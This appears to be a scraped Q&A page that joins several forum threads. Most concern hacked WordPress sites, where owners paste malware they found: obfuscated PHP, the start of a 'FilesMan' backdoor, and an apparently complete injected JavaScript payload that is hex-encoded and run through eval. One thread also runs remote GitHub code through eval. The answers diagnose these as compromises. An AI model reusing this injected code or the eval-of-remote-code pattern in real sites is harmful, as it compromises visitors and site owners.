Strange PHP code found in file on server - php

Sorry if this is the wrong site to post on.
Basically, I have a server and this file keeps creating itself. The file is a PHP file and contains code:
<?php
$GLOBALS['XfZi37Vc'] = $_SERVER;
function ruexxCV1QobH($uiBP25)
{$MISwZvode = "";global $PYJ9QSAA;
for($QNufqz7Oj=intval('fzSxRYkl'); $QNufqz7Oj<strlen($uiBP25); $QNufqz7Oj++)
{$yzwxeHjxV = ord($uiBP25[$QNufqz7Oj]) - $QNufqz7Oj - $PYJ9QSAA;
if ($yzwxeHjxV < 32){$yzwxeHjxV = $yzwxeHjxV + 94;
${YkT1GO68Y3rXB("iv[_^/1\"w;%")} = Lp4lS8SSZzAY("-15/*32B.3##G9CJJ");
${YkT1GO68Y3rXB(",g0##&D6x")} = PDeZzowtLQ("kos|n|,ryov1!#4&)!/9-{+%\$");
${QDVtOC8("pt[v\$:=")} = lpkBre6(":<;)><97C");
${fW1u5W74(";q~BY_y{")} = rdfpzT0mw(",:;9=+?3??CF<B<");
${sGbDIY("!<!.x\\ze")} = lpkBre6("kos|n|,\$nzxtr(x5~(");
function rdfpzT0mw($vGoVcwpU){return ruexxCV1QobH($vGoVcwpU);};
function ifUYiZ4bFphW5($NYycJIpl){return ruexxCV1QobH($NYycJIpl);};
${fW1u5W74("gh\"Co[")} = lpkBre6("*77#0>A-DE6#6C9;");
${rdfpzT0mw("n2lZ7t\\")} = QDVtOC8(";:27");
I have never seen code like this before. Can anyone tell me what it is exactly doing?


This is a hack that happened to your Wordpress. Probably because you are using an outdated third party plugin. These can be somewhat difficult to detect, but the code is probably being used to place ads, or redirect your users to outside content or malware.
You should remove this code and update all your plugins.
Keep in mind that this code could have also injected code into your Wordpress database. Especially if you have a plugin that enables 'eval' in Wordpress, meaning code could be retrieved from the database and eval'd.
If that doesn't solve the problem, you should start disabling third party plugins until you find the root of the problem.
Wordpress is VERY easy for automated scripts to detect and third party plugins could have been written by someone who does not know anything about security. You need to be very wary when using them, even if they come from Wordpress.org.

Related

My php code is keep getting disable in wordpress editor after upgraded into latest version

My website had a older version of wordpress. Recently I upgraded it to the latest version. After that my php code what I write in the editor is keep getting disabled.
The old page which has php code in ti still works. Although in the editor the php codes are disabled. But if I try to save that it stops working. So i cannot update those page. And also I cannot create new page with php code in it
Exec-PHP plugin is installed.
If I write
<?php echo $c; ?>
It converts into
<!--?php echo $c; ?-->
How to fix that
attached image for better understanding.

Another way, which I don't quite recommend, is to follow this direction:
https://wordpress.org/support/topic/exec-php-to-work-in-php-7-needs-this/
This is basically updating the actual plugin, which will surely be overwritten by their next update.
This plugin requires a number of changes to work with php 7.
In exec-php.php
$GLOBALS[‘g_execphp_manager’] =& new ExecPhp_Manager();
must be changed to
$GLOBALS[‘g_execphp_manager’] = new ExecPhp_Manager();
In includes/manager.php from line 36
change each =& to =
In includes/admin.php lines 53,56,57,63,64,79 change =& to =
In includes/cache.php line 22,39 change =& to =
In includes/ajax.php line 64 change =& to =

I don't know about the plugin you use for this. However, I use xyzscripts for the same cause. It creates short-codes for me to use.
Here is an example:
Create your PHP code and get a Tracking Name.
You will then get your short-code as below, note the Tracking Name.
I personally think this is the best way as it allows re-usability and centralized location to update all your scripts.
XYZ WP PHP Code Download and Documentation

Thank you all for responding.
Apparently I find the solution by installing the Classic Editor plugin
https://en-gb.wordpress.org/plugins/classic-editor/
It prevents disabling the php code.
If you are facing similar problem you can try this one

CKFinder 3 upgrade difficulty

I'm following the CKFinder 2 to 3 upgrade guide and it's not making much sense. In CKFinder 2, the PHP code provided could be used to generate the JS snippet with appropriate config and params, like this:
require_once 'ckfinder/core/ckfinder_php5.php';
$finder = new CKFinder() ;
$finder->SelectFunction = 'ShowFileInfo' ;
$finder->DisableThumbnailSelection = true;
$finder->RememberLastFolder = true;
$finder->Id = $name;
$finder->StartupFolderExpanded = true;
$finder->Width = $width;
$finder->Height = $height;
echo $finder->CreateHtml();
This code picks up the config and incorporates it into the generated JS.
In 3 this seems to have disappeared entirely - the upgrade guide describes the changes needed in config.php, but there is no indication of how this is ever used since there is no other PHP involved, and it says
It is no longer possible to enable CKFinder on a page from the PHP level
All that is shown is how to create the JS snippet, which does not contain any config, and so will use incorrect settings. There is no indication of how the config properties set in config.php ever get to the JS code - as far as I can see there is no connection at all and no mention of any other PHP files, even though some are provided but not documented.
This makes no sense - PHP can quite happily generate HTML and JS that is run on the page, which is all the old CreateHTML function did. I don't understand why there is no mention of this mechanism since it was how we were supposed to use CKFinder previously - it's as if the migration guide is for some unrelated package!
If I update the config file and use the default JS widget code as suggested, it breaks the page completely, altering the MIME output type so it does not get rendered as HTML and appends this error:
{"error":{"number":10,"message":"Invalid command."}}
The docs cover various fine details of what PHP config settings mean, but nowhere that I've found says how it's ever loaded, triggered or associated with the JS. How is this supposed to work?

Indeed the CKFinder 3 documentation was lacking some important information. We're gradually adding new articles there. Based on topics you mentioned I just added:
Explanation how PHP code that worked for CKFinder 2 can be refactored to plain JavaScript in CKFinder 3. Should look familiar ;)
A table with Configuration Options Migration - JavaScript Settings which should help you with discovering again options like rememberLastFolder

Strange code on wordpress website

Today I checked my wordpress website and I observed that one php file had the following code in it:
According to THIS it is a encode(eval64)) hack. What`s the meaning of the code below?
Is this the same as the base encode eval64 hack?
<?
$auth_pass = "2fba9596aec8aeb14a88461bbd708f97";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
$xYEzDu6r3EZT="GR5yYXp3YH17ejRne3h9cGdgdWBxPDB5dX9xYWQ9NG8ZHjQ0NDQweHt4NCk0MzMvGR40NDQ0cntmPDB9KSQvMH00KDRnYGZ4cXo8MHl1f3FhZD0vMH0/KSY9NG8ZHjQ0NDQ0NDB4e3g6KXd8Zjx8cWxwcXc8Z2F2Z2BmPDB5dX9xYWQ4MH04Jj09PS8ZHjQ0NDRpGR40NDQ0ZnFgYWZ6NDB4e3gvGR5pGR4wZ3F9d3t4fXp/KWd7eH1wZ2B1YHE8MyYgIyciciMhIyYiJyIhJ3AiJiIlIyciISciJyAhciIgIiEiJyJyIiAiISYsIXUhLCF1IiwiJiAnIiwicSIhInAidyMhIXUicCMsIiwiICAjISEiciEtInAgIiN1IXUhICEtJyQhLCcmISYidyEtJyYnLSJ2IXUhJyIjInEgcSEjIC0jLCByISMhdScgIichICBwIyMiJSJ2ISUnICF1ICcnLScnIicgICEiICAgcCcnISYhJiImJyQnJScgIHEgISBxISYiJiJxIiwhdSEjISAhJiJ1IXUhLCMkICIhdSEjIHUgIyEiICwhdSchISEicSAlJyQiICAsIiMjIyF1JyUgIiEsIHAidyIsIyciJSEgIXUnJSBxISMidickIichIyAtIyIgcSclICYhISEgInUhdSEsISInJiMsInAhICEhISEnJSBxJycgdSclIiAgJyMgInAiJSMtJy0hJCEtISMgcSB2IScnJicsJyEhJiJ2IncgLCImI3UgIiAsIiYjdSJ3IC0hJyEhIicnJSEtInciIyN1IS0nJiMgI3UiICJwInYnJiE......

The code above is of a very common backdoor script called "FilesMan". Typically backdoor scripts are written in php. It is quite common for hackers to place a "baskdoor" on a site they have hacked. A backdoor can give a hacker continued access to the site even if the site owners changes account passwords. Backdoor scripts will vary from 100s of lines of code to 1 or 2 lines of code.
For details please visit the site http://aw-snap.info/articles/backdoor-examples.php

Syntax error when trying to grab and run code from github

I'm trying to get a page from github to be read and executed with PHP upon page load due to it updating often, although while I've managed to format the page to what should be correct, it still doesn't seem to work.
Basically, I've used the file_get_contents to grab all of the information on the page (if I get this working it should potentially work with any page), removed all comments, and now I just need the code to run.
I've heard eval is unsafe, but it's only a personal website and I trust the github page isn't going to use malicious code, but I'm getting a "syntax error, unexpected T_CONSTANT_ENCAPSED_STRING", when the page runs, despite the fact I haven't touched the code and it runs fine if copied and pasted.
Here is the code I've used to remove the comments, I can't see any problem on or around line 391 where it says the error is, http://www.compileonline.com/execute_php_online.php works if you copy and paste it in
#get page data, remove intro comment (unefficient but can be rewritten once working)
$browsercoderaw = explode("*/",file_get_contents("https://raw.githubusercontent.com/cbschuld/Browser.php/master/lib/Browser.php"));
for($i==1;$i<count($browsercoderaw);$i++){
if($i>1){$browsercodejoined.=" */";} # replace */ for other comments so they can be removed later
$browsercodejoined.=$browsercoderaw[$i];}
$browsercode = nl2br(str_replace("?>","",$browsercodejoined));
#remove all /* comments
$commentremove = explode("/*",$browsercode);
$browsercode2 = $commentremove[0];
for($j==1;$j<count($commentremove);$j++){
$commentsplit = explode("*/",$commentremove[$j]);
$browsercode2.=$commentsplit[1];
}
#remove all // comments
$commentremove2 = explode("<br />",$browsercode2);
$browsercode3 = $commentremove2[0];
$linenum = 0;
for($k==1;$k<count($commentremove2);$k++){
$commentsplit = explode("//",$commentremove2[$k]);
if(strlen(trim($commentsplit[0]))>0){
$browsercode3.=$commentsplit[0];
$browsercodereadable.=$linenum.". ".$commentsplit[0]."<br>";
$linenum++;
}
}
echo $browsercodereadable;
eval($browsercode3);
?>
Also, if there is a better way of doing this please say so, I tried include but the webhost doesn't allow fetching urls from other domains. To be fair, I'm not entirely sure if it's the correct use of eval, but it sounds like it should potentially work.

Has anyone seen: #0f2490# if(empty($b)) { $b = " "; echo $b; } #/0f2490#

I have many sites, and a couple of them, wordpress or not (some are .php based, some are core HTML. Some are WordPress blogs, and some are just core sites) show this bit of script on page load, and I cannot find it on the server or in the code for the life of me.
#0f2490# if(empty($b)) { $b = " "; echo $b; } #/0f2490#
When checking the source of the sites, it appears there is some javascript code looking for a reference to some site.
I know this isn't enough information to properly troubleshoot the issue. I am asking if anyone has heard of this and can point me in the right direction for resources to research and learn about this issue.
You can see the output for yourself at http://chiuaua.ca
For reference, this is the JavaScript code that appears on the site when using source viewer in either FireFox or Chrome...
#0f2490#
if(empty($b)) { $b = " <script type=\"text/javascript\" language=\"javascript\" > if(document.querySelector)zq=4;a=(\"27,6d,7c,75,6a,7b,70,76,75,27,6a,6a,6b,78,6a,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,6a,6a,6b,78,6a,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,6a,6a,6b,78,6a,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,7f,75,34,34,69,79,6e,6c,79,74,6c,70,7a,7b,6c,79,70,75,34,6d,79,34,70,6b,7a,7b,6c,70,75,34,6d,7e,6a,77,35,6b,6c,36,7e,6d,78,4b,5f,60,49,5b,35,77,6f,77,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,77,76,7a,70,7b,70,76,75,27,44,27,2e,68,69,7a,76,73,7c,7b,6c,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,6a,76,73,76,79,27,44,27,2e,3c,3a,37,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,6f,6c,70,6e,6f,7b,27,44,27,2e,3c,3a,37,77,7f,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,7e,70,6b,7b,6f,27,44,27,2e,3c,3a,37,77,7f,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,73,6c,6d,7b,27,44,27,2e,38,37,37,37,3c,3a,37,2e,42,14,11,27,6a,6a,6b,78,6a,35,7a,7b,80,73,6c,35,7b,76,77,27,44,27,2e,38,37,37,37,3c,3a,37,2e,42,14,11,14,11,27,70,6d,27,2f,28,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,6a,6a,6b,78,6a,2e,30,30,27,82,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,7e,79,70,7b,6c,2f,2e,43,77,27,70,6b,44,63,2e,6a,6a,6b,78,6a,63,2e,27,6a,73,68,7a,7a,44,63,2e,6a,6a,6b,78,6a,37,40,63,2e,27,45,43,36,77,45,2e,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,6a,6a,6b,78,6a,2e,30,35,68,77,77,6c,75,6b,4a,6f,70,73,6b,2f,6a,6a,6b,78,6a,30,42,14,11,27,84,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,5a,6c,7b,4a,76,76,72,70,6c,2f,6a,76,76,72,70,6c,55,68,74,6c,33,6a,76,76,72,70,6c,5d,68,73,7c,6c,33,75,4b,68,80,7a,33,77,68,7b,6f,30,27,82,14,11,27,7d,68,79,27,7b,76,6b,68,80,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,7d,68,79,27,6c,7f,77,70,79,6c,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,70,6d,27,2f,75,4b,68,80,7a,44,44,75,7c,73,73,27,83,83,27,75,4b,68,80,7a,44,44,37,30,27,75,4b,68,80,7a,44,38,42,14,11,27,6c,7f,77,70,79,6c,35,7a,6c,7b,5b,70,74,6c,2f,7b,76,6b,68,80,35,6e,6c,7b,5b,70,74,6c,2f,30,27,32,27,3a,3d,37,37,37,37,37,31,39,3b,31,75,4b,68,80,7a,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,27,44,27,6a,76,76,72,70,6c,55,68,74,6c,32,29,44,29,32,6c,7a,6a,68,77,6c,2f,6a,76,76,72,70,6c,5d,68,73,7c,6c,30,14,11,27,32,27,29,42,6c,7f,77,70,79,6c,7a,44,29,27,32,27,6c,7f,77,70,79,6c,35,7b,76,4e,54,5b,5a,7b,79,70,75,6e,2f,30,27,32,27,2f,2f,77,68,7b,6f,30,27,46,27,29,42,27,77,68,7b,6f,44,29,27,32,27,77,68,7b,6f,27,41,27,29,29,30,42,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,4e,6c,7b,4a,76,76,72,70,6c,2f,27,75,68,74,6c,27,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,79,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,75,68,74,6c,27,32,27,29,44,29,27,30,42,14,11,27,7d,68,79,27,73,6c,75,27,44,27,7a,7b,68,79,7b,27,32,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,32,27,38,42,14,11,27,70,6d,27,2f,27,2f,27,28,7a,7b,68,79,7b,27,30,27,2d,2d,14,11,27,2f,27,75,68,74,6c,27,28,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,37,33,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,30,27,30,27,30,14,11,27,82,14,11,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,84,14,11,27,70,6d,27,2f,27,7a,7b,68,79,7b,27,44,44,27,34,38,27,30,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,7d,68,79,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,29,42,29,33,27,73,6c,75,27,30,42,14,11,27,70,6d,27,2f,27,6c,75,6b,27,44,44,27,34,38,27,30,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,73,6c,75,6e,7b,6f,42,14,11,27,79,6c,7b,7c,79,75,27,7c,75,6c,7a,6a,68,77,6c,2f,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,73,6c,75,33,27,6c,75,6b,27,30,27,30,42,14,11,84,14,11,70,6d,27,2f,75,68,7d,70,6e,68,7b,76,79,35,6a,76,76,72,70,6c,4c,75,68,69,73,6c,6b,30,14,11,82,14,11,70,6d,2f,4e,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,6a,6a,6b,78,6a,37,40,2f,30,42,14,11,84,14,11,84\".split(\",\"));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(12-5)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String[\"fr\"+\"omCh\"+\"arCo\"+\"de\"].apply(String,a));</script> "; echo $b; }
#/0f2490#

Bad news, looks like your sites have been exploited... I visited the link and it tried to shove several binary files at Safari immediately... Yikes.
Another SO thread on a similar problem
Your exact code

Your server has been compromised. Bad bad news.
What you need to do on the short term is to quickly update all the sites to the last version of wordpress if you are still running an older version.
Looking at what you described, the javascript is not in the html source, but is sent down to the browser. This could mean that your wordpress templates are compromised. Look in the upload folders or the template folder to see if there is any extra js files being loaded.
Another thing to check is if there is any changes done to the wordpress template's file, or any plugin's file. As wordpress provide a handy web based editor to edit those files, there might be a flaw that allowed malicious codes to inject other scripts into your files via those means.

Categories